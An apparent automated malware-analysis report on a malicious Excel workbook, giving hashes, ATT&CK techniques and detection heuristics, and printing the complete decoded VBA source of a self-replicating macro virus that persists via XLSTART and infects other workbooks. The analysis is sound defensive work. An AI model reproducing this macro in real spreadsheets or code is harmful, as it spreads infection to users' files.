Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5cd72ae289d65f55…

MALICIOUS

Office (OLE) / .XLS

124.0 KB Created: 2010-03-18 09:59:00 Authoring application: Microsoft Excel First seen: 2026-05-11
MD5: f00d60a3378b61dece1381e3e4d7e2ad SHA-1: 0bdc5d563704570732912819476475657a5e8308 SHA-256: 5cd72ae289d65f55a4d3f676eeead2071771a866c8e7e96071b678c8a78bca65
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Mark-of-the-Web Bypass

The VBA macro `auto_open` sets up an `OnSheetActivate` hook to execute the `SearchSelf` subroutine. This subroutine checks for the presence of `nt².xls` in the Excel startup path (`Application.StartupPath`). If not found, it copies the current workbook to the startup path and saves it as `nt².xls`, effectively establishing persistence. It also attempts to copy the 'nt²' sheet into other workbooks, indicating a spreading mechanism.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
            ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = "SearchSelf"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1191 bytes
SHA-256: 817ec2508106e860fa2acdafadbc60b8fa114e428447958bcc39259159851616
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nt²"
Private Sub auto_open()
    Application.OnSheetActivate = "SearchSelf"
End Sub

Private Static Sub SearchSelf()
On Error Resume Next
Const Self As String = "nt².xls"
Dim Resident As Boolean, strCurrDir As String

    Application.ScreenUpdating = False
    Resident = Dir(Application.StartupPath & "\" & Self) = Self
    If Resident Then
       If ActiveWorkbook.Sheets(1).Name <> "nt²" Then
           Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1)
       End If
    Else
        Sheets("nt²").Select: Sheets("nt²").Copy
        strCurrDir = CurDir()
        ChDir Application.StartupPath
        Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self
        ChDir strCurrDir
        ActiveWindow.Visible = False
        Workbooks(Self).Save
    End If
    
     
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.